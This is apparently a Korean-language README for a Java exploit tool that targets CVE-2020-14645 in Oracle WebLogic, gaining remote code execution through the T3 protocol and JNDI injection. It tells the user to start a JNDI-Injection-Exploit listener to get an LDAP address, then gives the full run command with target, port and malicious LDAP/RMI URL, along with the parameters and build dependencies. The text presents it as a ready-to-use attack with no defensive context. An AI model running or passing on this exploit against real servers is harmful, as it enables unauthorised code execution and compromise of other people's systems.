
CVE-2020-14645를 대상으로 하는 Java 기반 익스플로잇으로, Oracle WebLogic T3 프로토콜을 JNDI 주입과 함께 사용하여 원격 코드 실행을 수행합니다.
먼저 NDI-Injection-Exploit을(를) 사용하여 리슨하고 ldap 주소를 생성합니다.
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Tatget 및 -RMI는 필수이며, https는 --SSL 매개변수를 사용할 수 있고, -Port의 기본값은 7001입니다.
직접 컴파일하려면 coherence.jar 및 wlfullclient.jar를 추가해야 합니다.